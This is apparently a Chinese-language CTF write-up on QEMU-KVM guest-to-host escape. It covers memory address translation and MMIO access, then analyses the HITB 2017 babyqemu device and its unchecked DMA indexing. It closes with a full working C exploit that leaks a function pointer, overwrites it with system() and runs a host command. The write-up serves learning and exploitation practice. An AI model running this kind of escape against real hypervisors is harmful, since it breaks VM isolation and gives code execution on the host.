Qemu-KVM逃逸-0x01

Qemu-KVM逃逸-0x01

Created
Oct 20, 2021 09:32 AM
Tags
 

Qemu-kvm原理

notion image
 
notion image
  1. Qemu是一个通用的开源机器模拟器(emulator)和虚拟化器(virtualizer)
      • 模拟各种架构的硬件,使用二进制翻译技术
      • 创建虚拟机,通过ioctl与内核KVM模块进行交互
  1. Qemu为每个虚拟机创建一个进程,在该进程中为每个虚拟CPU创建一个线程,Guest系统和应用都运行在虚拟CPU上
  1. Qemu可以模拟I/O 处理,执行流程:虚拟机中进行I/O 操作 → 进入KVM → KVM进行判断处理并将控制权交给Qemu,由Qemu来模拟I/O 设备去响应虚拟机中的I/O 请求
  1. KVM是Linux系统的内核模块,实现CPU的虚拟化、内存的虚拟化
 
 

内存布局

  1. GVA : guest virtual address 虚拟机中的虚拟地址
  1. GPA : guest physical address 虚拟机中的物理地址
  1. HVA : host virtual address 宿主机中的虚拟地址
  1. HPA : host physical address 宿主机中的物理地址
 
示意图如下所示:
                        Guest' processes
                     +--------------------+
Virtual addr space   |                    |   (GVA)
                     +--------------------+
                     |                    |
                     \__   Page Table     \__
                        \                    \
                         |                    |  Guest kernel
                    +----+--------------------+----------------+
Guest's phy  memory |    |                    |                |   (GPA)
                    +----+--------------------+----------------+
                    |                                          |
                    \__                                        \__
                       \                                          \
                        |             QEMU process                 |
                   +----+------------------------------------------+
Virtual addr space |    |                                          |   (HVA)
                   +----+------------------------------------------+
                   |                                               |
                    \__                Page Table                   \__
                       \                                               \
                        |                                               |
                   +----+-----------------------------------------------+----+
Physical memory    |    |                                               |    |   (HPA)
                   +----+-----------------------------------------------+----+
 
地址转换:GVA → GPA → HVA → HPA
 
虚拟机的物理内存(GPA空间)实际上是宿主机上Qemu进程通过mmap申请出来的一段内存,因此每个GPA都对应Qemu进程中的一个HVA
 
测试代码:
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
 
#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)    //4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)
 
int fd;
 
/* Return the offset of addr inside its page, i.e. its low PAGE_SHIFT bits. */
uint64_t page_offset(uint64_t addr)
{
    const uint64_t in_page_mask = (1 << PAGE_SHIFT) - 1;

    return addr & in_page_mask;
}
 
/*
 * Translate a guest virtual address into its guest frame number (GFN) by
 * reading the matching 64-bit entry from the pagemap file.
 *
 * Uses the file-scope descriptor `fd`, which must already refer to the
 * opened /proc/self/pagemap.
 *
 * Returns the frame number, or (uint64_t)-1 when the entry cannot be read
 * or the page is not marked present.
 *
 * NOTE(review): newer Linux kernels are documented to report a zero PFN to
 * unprivileged readers -- confirm the program runs with enough privileges.
 */
uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme = 0;
    size_t offset;
    ssize_t got;

    /* One 8-byte entry per page: (addr >> 12) * 8, low three bits cleared. */
    offset = ((uintptr_t)addr >> 9) & ~7;
    if (lseek(fd, offset, SEEK_SET) < 0)
        return -1;

    /* A short or failed read would leave the entry incomplete. */
    got = read(fd, &pme, sizeof pme);
    if (got != (ssize_t)sizeof pme)
        return -1;

    if (!(pme & PFN_PRESENT))
        return -1;
    return pme & PFN_PFN;
}
 
/*
 * Convert a guest virtual address into the matching guest physical address:
 * look up the page frame number of addr, then combine it with the offset of
 * addr inside its page. Asserts that the frame lookup succeeded.
 */
uint64_t gva_to_gpa(void *addr)
{
    uint64_t frame;
    uint64_t in_page;

    frame = gva_to_gfn(addr);   /* addr is a GVA; fetch its frame number */
    assert(frame != -1);

    in_page = page_offset((uint64_t)addr);
    return (frame << PAGE_SHIFT) | in_page;   /* resulting GPA */
}
 
/*
 * Demo: place a marker string on the heap, print the guest physical address
 * it lives at, then wait on stdin so the process stays alive while the
 * address is inspected from outside.
 */
int main()
{
    uint8_t *ptr;
    uint64_t ptr_mem;

    /* The pagemap file exposes this process's virtual-to-physical mapping. */
    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }

    ptr = malloc(256);
    if (ptr == NULL) {
        perror("malloc");
        exit(1);
    }
    /* strcpy/printf("%s") take char *, so cast away the uint8_t-ness. */
    strcpy((char *)ptr, "Where am I?");
    printf("%s\n", (char *)ptr);
    ptr_mem = gva_to_gpa(ptr);    /* guest virtual -> guest physical */

    /* ptr_mem is now the physical address of the string inside the VM. */
    printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem);

    getchar();
    free(ptr);
    return 0;
}
 
编译命令:gcc mmu.c -static -o mmu
使用Qemu启动一个虚拟机,把编译好的程序放进去运行
notion image
再通过gdb attach到qemu的进程上,用search查找该字符串
notion image
计算起始地址:
>>> hex(0x7fb153819880-0x3a19880)
'0x7fb14fe00000'
>>>
 
gdb中使用vmmap命令查看qemu的地址空间
notion image
综上所述,0x7fb14fe00000就是虚拟机物理地址为0的位置。
 

DMA

DMA本身不属于某一类外设,它是一种外设与内存传输数据的方式。
 
 

PCI设备地址空间

PCI设备可以申请两类地址空间,分别是memory space和I/O space。
通过memory space访问设备I/O的方式称为memory mapped I/O(MMIO),在MMIO中,内存和I/O设备共享同一个地址空间。
 

Qemu中访问I/O空间

用户态访问,通过映射resource0文件实现内存的访问
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>


unsigned char* mmio_mem;

/* Report msg together with the current errno text, then exit with status -1. */
void die(const char *msg) {
    perror(msg);
    exit(-1);
}



/*
 * Store a 32-bit value to the device register at byte offset addr inside
 * the mapped MMIO window (mmio_mem).
 *
 * The access goes through a volatile pointer so the compiler emits exactly
 * one store and cannot drop, merge or reorder it against other MMIO accesses.
 */
void mmio_write(uint32_t addr, uint32_t value)
{
    *((volatile uint32_t*)(mmio_mem + addr)) = value;
}

/*
 * Load a 32-bit value from the device register at byte offset addr inside
 * the mapped MMIO window (mmio_mem) and return it.
 *
 * The access goes through a volatile pointer so the load is performed even
 * when the caller ignores the result.
 */
uint32_t mmio_read(uint32_t addr)
{
    return *((volatile uint32_t*)(mmio_mem + addr));
}




/*
 * Map the first 0x1000 bytes of the PCI device's resource0 file and perform
 * one 32-bit read and one 32-bit write at offset 0x128 of that window.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    // Open and map I/O memory for the strng device
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");

    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");

    /* The mapping stays valid after the descriptor is closed. */
    close(mmio_fd);

    printf("mmio_mem @ %p\n", (void *)mmio_mem);

    mmio_read(0x128);
    mmio_write(0x128, 1337);

    munmap(mmio_mem, 0x1000);
    return 0;
}
 
 
 

HITB GSEC 2017 babyqemu 逃逸

题目附件信息:
ls -al
总用量 51524
drwxr-xr-x  4 root root     4096 Oct 21 11:54 .
drwx------ 88 root root     4096 Oct 21 12:08 ..
drwxr-xr-x 17 root root     4096 Oct 20 14:54 file  #rootfs.cpio 解压出来的文件系统
-rwxr-xr-x  1 root root      291 Oct 21 11:52 launch.sh#启动VM命令
drwxr-xr-x  6 root root     4096 Jul 11  2017 pc-bios
-rwxr-xr-x  1 root root 39682064 Jul 11  2017 qemu-system-x86_64
-rw-r--r--  1 root root  5734400 Oct 21 11:49 rootfs.cpio#文件系统
-rwxr-xr-x  1 root root  7308672 Jul 11  2017 vmlinuz-4.8.0-52-generic#linux内核文件
 
启动命令:
cat launch.sh 
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic  -L ./dependency/usr/local/share/qemu \
-L pc-bios \
-device hitb,id=vda
关键点是-device hitb,表明了该VM系统中存在一个hitb驱动设备
 
将qemu-system-x86_64载入IDA中,发现是存在符号的,通过函数名中的关键字筛选出一些关键函数如下所示:
notion image
 
首先看函数pci_hitb_register_types,该函数是进行PCI设备注册
/* IDA-decompiled: registers the type described by hitb_info_27046. */
void __cdecl pci_hitb_register_types()
{
  type_register_static(&hitb_info_27046);
}
通过查看hitb_info_27046,得到class_init和instance_init对应的实例
notion image
 
在local_type中通过搜索关键字找到相关的结构体
notion image
 
hitb_class_init函数中,设置了PCI配置的一些信息
/*
 * IDA-decompiled class initializer for the hitb device.
 * Casts the incoming class object to PCIDeviceClass and fills in the PCI
 * identification fields and the realize/exit callbacks.
 */
void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
  PCIDeviceClass *v2; // rax

  // NOTE(review): the two struct-member expressions below look like
  // decompiler mis-symbolization of constant addresses -- confirm in IDA.
  v2 = object_class_dynamic_cast_assert(
         a1,
         &stru_64A230.bulk_in_pending[2].data[72],
         &stru_5AB2C8.msi_vectors,
         469,
         "hitb_class_init");
  v2->revision = 16;
  v2->class_id = 255;                   // 0x00ff, shown by lspci as "Class 00ff"
  v2->realize = pci_hitb_realize;
  v2->exit = pci_hitb_uninit;
  v2->vendor_id = 0x1234;               // lspci shows the pair as 1234:2333
  v2->device_id = 0x2333;
}
 
运行VM,使用lspci命令查看pci设备,可以看到最后一个就是hitb
Welcome to HITB
HITB login: root
# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
#
 
hitb_instance_init函数中初始化了HitbState->enc的初始值
/*
 * IDA-decompiled instance initializer for the hitb device.
 * Sets dma_mask, stores the hitb_enc function pointer into the state
 * structure and adds an object property backed by hitb_obj_uint64.
 */
void __fastcall hitb_instance_init(Object_0 *obj)
{
  HitbState *v1; // rax

  v1 = object_dynamic_cast_assert(
         obj,
         &stru_5AB2C8.not_legacy_32bit + 12,
         &stru_5AB2C8.msi_vectors,
         459,
         "hitb_instance_init");
  v1->dma_mask = 0xFFFFFFFLL;
  // Decompiler pointer arithmetic: v1 is advanced and then indexed backwards
  // to reach the slot that receives hitb_enc.
  v1 = (v1 + 7104);
  *(&v1[-1].dma_mask + 1) = hitb_enc;           // stores the address of hitb_enc into the enc field of HitbState
  object_property_add(
    obj,
    &stru_5AB2C8.server_bar2.coalesced.tqh_first + 3,
    "uint64",
    hitb_obj_uint64,
    hitb_obj_uint64,
    0LL,
    v1,
    0LL);
}
 
pci_hitb_realize函数中,首先添加了一个qemu-timer,也就是说,定时器被激活后会执行指定的回调函数,此处该函数是hitb_dma_timer;接着注册了hitb_mmio_ops结构体,指明了MMIO读写时具体由哪个函数处理,分别是hitb_mmio_read和hitb_mmio_write
 
hitb_mmio_read函数中,第二个参数决定函数返回哪块区域内存。
/*
 * IDA-decompiled MMIO read handler of the hitb device.
 *
 * Only 4-byte accesses are served; any other size, or an unhandled offset,
 * yields -1. Offsets handled for size == 4:
 *   0x00 -> constant 16777453 (0x010000ED)
 *   0x04 -> opaque->addr4
 *   0x08 -> opaque->fact (read while holding thr_mutex)
 *   0x20 -> opaque->status
 *   0x24 -> opaque->irq_status
 *   0x80 -> opaque->dma.src
 *   0x84 -> value read starting 4 bytes into opaque->dma.src
 *   0x88 -> opaque->dma.dst
 *   0x8c -> value read starting 4 bytes into opaque->dma.dst
 *   0x90 -> opaque->dma.cnt
 *   0x98 -> opaque->dma.cmd
 */
uint64_t __fastcall hitb_mmio_read(HitbState *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax
  uint64_t val; // [rsp+0h] [rbp-20h]

  result = -1LL;
  if ( size == 4 )
  {
    if ( addr == 128 )
      return opaque->dma.src;
    if ( addr > 0x80 )
    {
      // DMA register bank above 0x80
      if ( addr == 140 )
        return *(dma_addr_t *)((char *)&opaque->dma.dst + 4);
      if ( addr <= 0x8C )
      {
        if ( addr == 132 )
          return *(dma_addr_t *)((char *)&opaque->dma.src + 4);
        if ( addr == 136 )
          return opaque->dma.dst;
      }
      else
      {
        if ( addr == 144 )
          return opaque->dma.cnt;
        if ( addr == 152 )
          return opaque->dma.cmd;
      }
    }
    else
    {
      // Registers below 0x80
      if ( addr == 8 )
      {
        // fact is read under the thread mutex
        qemu_mutex_lock(&opaque->thr_mutex);
        val = opaque->fact;
        qemu_mutex_unlock(&opaque->thr_mutex);
        return val;
      }
      if ( addr <= 8 )
      {
        result = 16777453LL;
        if ( !addr )
          return result;
        if ( addr == 4 )
          return opaque->addr4;
      }
      else
      {
        if ( addr == 32 )
          return opaque->status;
        if ( addr == 36 )
          return opaque->irq_status;
      }
    }
    // No register matched: fall back to -1
    result = -1LL;
  }
  return result;
}
 
hitb_mmio_write函数中,第二个参数决定要改的区域,第三个参数决定值。
  • addr=0x80 , opaque->dma.src = val
  • addr=0x84 , *(dma_addr_t *)((char *)&opaque->dma.src + 4) = val
  • addr=0x88 , opaque->dma.dst = val
  • addr=0x8c , *(dma_addr_t *)((char *)&opaque->dma.dst + 4) = val;
  • addr=0x90 , opaque->dma.cnt = val;
  • addr=0x98 , opaque->dma.cmd = val;并调用timer_mod激活定时器
 
hitb_dma_timer函数中根据 opaque->dma.cmd的值来决定做什么操作
  • opaque->dma.cmd=1|2|4时,先计算v2 = (unsigned int)(LODWORD(opaque->dma.src) - 0x40000),接着执行opaque->enc(&opaque->dma_buf[v2], opaque->dma.cnt)对数据进行加密,然后调用cpu_physical_memory_rw函数将&opaque->dma_buf[v2]处的内容拷贝到物理地址opaque->dma.dst,拷贝长度为opaque->dma.cnt
  • opaque->dma.cmd=1|2时,不调用enc加密,直接将&opaque->dma_buf[v2]处的内容拷贝到opaque->dma.dst
  • opaque->dma.cmd=1(即1|0)时,方向相反:将物理地址opaque->dma.src处长度为opaque->dma.cnt的内容拷贝到dma_buf[opaque->dma.dst - 0x40000]中
 
 
漏洞所在:dma.src和dma.dst都是我们可以控制的,而它们减去0x40000后直接作为dma_buf的下标使用,没有经过有效的边界检查。利用dma.cmd=1|2(或1|2|4)可以越界读取dma_buf之外的内存,利用dma.cmd=1|0可以越界写dma_buf之外的内存。
enc函数指针位于dma_buf之后,并且我们可以控制程序执行到enc函数,因此攻击思路就是把enc函数指针覆盖成system的地址,再把参数&opaque->dma_buf[v2]处的内容改成想要执行的命令即可。
 
 
 
exp:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <ctype.h>
#include <termios.h>
#include <assert.h>

#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>

#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)

#define DMA_BASE 0x40000


#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)

char* pci_device_name = "/sys/devices/pci0000:00/0000:00:04.0/resource0";

unsigned char* tmpbuf;
uint64_t tmpbuf_phys_addr;
unsigned char* mmio_base;

/*
 * Open the PCI resource file named by pci_device_name, map MAP_SIZE bytes of
 * it read/write, store the mapping in mmio_base and return it.
 * Prints an error and exits with status -1 if open or mmap fails.
 */
unsigned char* getMMIOBase(){
    int dev = open(pci_device_name, O_RDWR | O_SYNC);

    if (dev == -1) {
        perror("open pci device");
        exit(-1);
    }

    mmio_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, dev, 0);
    if (mmio_base == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }

    return mmio_base;
}

// Return the offset of addr inside its page (addr & 0xfff for 4 KiB pages).
uint32_t page_offset(uint32_t addr)
{
    const uint32_t in_page_mask = (1 << PAGE_SHIFT) - 1;

    return addr & in_page_mask;
}

/*
 * Translate a guest virtual address into its guest frame number (GFN) by
 * reading the matching 64-bit entry from /proc/self/pagemap.
 *
 * Returns the frame number, or (uint64_t)-1 when the entry cannot be read
 * or the page is not marked present. Exits with status 1 if the pagemap
 * file cannot be opened.
 */
uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme = 0;
    uint64_t gfn = -1;      /* failure sentinel until a present entry is read */
    size_t offset;
    int fd;

    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }

    /*
     * Each page has one 8-byte entry, so the file offset is
     * (addr / 4096) * 8. That equals (addr >> 9) with the low three bits
     * cleared: ">> 12 << 3" always leaves them zero, a plain ">> 9" does
     * not, hence the "& ~7".
     */
    offset = ((uintptr_t)addr >> 9) & ~7;

    /* Accept the entry only if the seek and the full 8-byte read succeed
     * and the page is present. */
    if (lseek(fd, offset, SEEK_SET) >= 0 &&
        read(fd, &pme, sizeof pme) == (ssize_t)sizeof pme &&
        (pme & PFN_PRESENT)) {
        gfn = pme & PFN_PFN;    /* physical frame number */
    }

    /* The descriptor is private to this call; do not leak it. */
    close(fd);
    return gfn;
}

/*
 * Convert a guest virtual address into the matching guest physical address:
 * frame number of the page shifted up by PAGE_SHIFT, OR-ed with the offset
 * of addr inside its page. Asserts that the frame lookup succeeded.
 */
uint64_t gva_to_gpa(void *addr)
{
    uint64_t frame;
    uint64_t in_page;

    frame = gva_to_gfn(addr);
    assert(frame != -1);

    in_page = page_offset((uint64_t)addr);
    return (frame << PAGE_SHIFT) | in_page;
}

/*
 * Store a 64-bit value at byte offset addr inside the mapped MMIO window
 * (mmio_base).
 *
 * The access is volatile so the compiler emits every register store, in
 * program order; the DMA setup sequence relies on src/dst/cnt being written
 * before the command register.
 */
void mmio_write(uint64_t addr, uint64_t value)
{
    *((volatile uint64_t*)(mmio_base + addr)) = value;
}

/*
 * Load a 64-bit value from byte offset addr inside the mapped MMIO window
 * (mmio_base) and return it.
 *
 * The access is volatile so the load is always performed and is not
 * reordered against other MMIO accesses.
 */
uint64_t mmio_read(uint64_t addr)
{
    return *((volatile uint64_t*)(mmio_base + addr));
}

/* Write val to the device's dma.cnt register (MMIO offset 0x90). */
void set_cnt(uint64_t val)
{
    const uint64_t cnt_reg = 0x90;

    mmio_write(cnt_reg, val);
}

/* Write val to the device's dma.src register (MMIO offset 0x80). */
void set_src(uint64_t val)
{
    const uint64_t src_reg = 0x80;

    mmio_write(src_reg, val);
}

/* Write val to the device's dma.dst register (MMIO offset 0x88). */
void set_dst(uint64_t val)
{
    const uint64_t dst_reg = 0x88;

    mmio_write(dst_reg, val);
}

/* Write val to the device's dma.cmd register (MMIO offset 0x98), which arms the DMA timer. */
void start_dma_timer(uint64_t val){
    const uint64_t cmd_reg = 0x98;

    mmio_write(cmd_reg, val);
}

/*
 * Ask the device to copy cnt bytes starting at dma_buf[offset] into the
 * bounce buffer (physical address tmpbuf_phys_addr), without calling enc.
 * Blocks for one second to give the DMA timer time to run.
 */
void dma_read(uint64_t offset, uint64_t  cnt){
    const uint64_t cmd = 1|2;               /* device -> guest memory, no enc */

    set_src(DMA_BASE + offset);             /* index into dma_buf */
    set_dst(tmpbuf_phys_addr);              /* physical address to copy to */
    set_cnt(cnt);                           /* number of bytes */
    start_dma_timer(cmd);                   /* triggers hitb_dma_timer */

    sleep(1);                               /* wait for the transfer to finish */
}

/*
 * Copy cnt bytes from buf into the device's dma_buf at the given offset.
 * The data is first staged in the bounce buffer tmpbuf, then the device is
 * told to DMA from tmpbuf's physical address into dma_buf[offset].
 * Blocks for one second to give the DMA timer time to run.
 */
void dma_write(uint64_t offset, char* buf, uint64_t  cnt)
{
    const uint64_t cmd = 1;                 /* guest memory -> device */

    memcpy(tmpbuf, buf, cnt);               /* stage the payload in tmpbuf */

    set_src(tmpbuf_phys_addr);              /* physical address to read from */
    set_dst(DMA_BASE + offset);             /* index into dma_buf */
    set_cnt(cnt);                           /* number of bytes */
    start_dma_timer(cmd);                   /* triggers hitb_dma_timer */

    sleep(1);                               /* wait for the transfer to finish */
}

/* Write the 8 bytes of val into the device's dma_buf at the given offset. */
void dma_write_qword(uint64_t offset, uint64_t val)
{
    char *raw = (char *)&val;

    dma_write(offset, raw, sizeof val);
}

/*
 * Same transfer as dma_read, but with the enc bit set in the command, so the
 * device calls opaque->enc on &dma_buf[offset] before copying cnt bytes to
 * the bounce buffer. Blocks for one second to let the DMA timer run.
 */
void dma_enc_read(uint64_t offset, uint64_t  cnt)
{
    const uint64_t cmd = 1|2|4;             /* device -> guest memory, with enc */

    set_src(DMA_BASE + offset);             /* index into dma_buf */
    set_dst(tmpbuf_phys_addr);              /* physical address to copy to */
    set_cnt(cnt);                           /* number of bytes */
    start_dma_timer(cmd);                   /* triggers hitb_dma_timer */

    sleep(1);                               /* wait for the transfer to finish */
}

int main(int argc, char const *argv[])
{
    getMMIOBase();
    printf("mmio_base Resource0Base: %p\n", mmio_base);

    tmpbuf = malloc(0x1000);
    tmpbuf_phys_addr = gva_to_gpa(tmpbuf);
    printf("gva_to_gpa tmpbuf_phys_addr %p\n", (void*)tmpbuf_phys_addr);

    //just test
    // dma_write(0, "giantbranch", 11);
    // dma_read(0, 11);
    // printf("tmpbuf: %s\n", tmpbuf);


    // 将enc函数指针写到tmpbuf_phys_addr,之后通过tmpbuf读出即可
    dma_read(4096, 8);
    uint64_t hitb_enc_addr = *((uint64_t*)tmpbuf);
    uint64_t binary_base_addr = hitb_enc_addr - 0x283DD0;
    uint64_t system_addr = binary_base_addr + 0x1FDB18;
    printf("hitb_enc_addr: 0x%lx\n", hitb_enc_addr);
    printf("binary_base_addr: 0x%lx\n", binary_base_addr);
    printf("system_addr: 0x%lx\n", system_addr);

    // 覆盖enc函数指针为system地址
    dma_write_qword(4096, system_addr);

    
    // 将我们要执行的命令复制到tmpbuf中
    // char* command = "gnome-calculator";
    // char* command = "pwd";
    char* command = "uname -a";
    dma_write(0x200, command, strlen(command));

    // 触发hitb_dma_timer中的enc函数,从而调用syetem
    // 下面的666设置的是cnt,可以是任意值,没什么影响
    dma_enc_read(0x200, 666);
    
    return 0;
}
攻击效果:
notion image